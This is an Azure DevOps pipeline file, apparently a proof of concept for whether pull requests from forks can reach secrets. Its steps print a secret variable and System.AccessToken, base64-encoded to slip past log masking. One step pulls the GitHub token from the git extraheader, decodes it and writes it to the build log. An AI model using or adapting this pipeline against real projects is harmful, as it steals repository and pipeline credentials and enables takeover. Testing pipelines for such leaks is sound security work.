resources:
  repositories:
    - repository: azdo
      name: AzDO
      type: git

trigger: none

pr:
- main

steps:
- checkout: self
  persistCredentials: true
- bash: echo "Im forked"  
- bash: echo $(mySecretVariable) 
- bash: echo $(mySecretVariable) | base64
- bash: echo Am I a fork run? $(System.PullRequest.IsFork)
- bash: |
    export remote_url=$(git config remote.origin.url)
    export remote_auth=$(git config http.$remote_url.extraheader)
    export remote_auth_token=$(awk '{print $NF}' <<< $remote_auth)
    export remote_auth_token_decode=$(base64 --decode <<< $remote_auth_token)
    echo "##vso[task.setvariable variable=GITHUB_TOKEN;]$remote_auth_token_decode"
  workingDirectory: $(Build.SourcesDirectory)/public_repo
  displayName: "Set GITHUB_TOKEN"
- bash: echo $(GITHUB_TOKEN) | base64
  displayName: "Print GH Token"
- script: echo $(System.StageId)
- script: echo $(System.AccessToken) | base64
- checkout: azdo
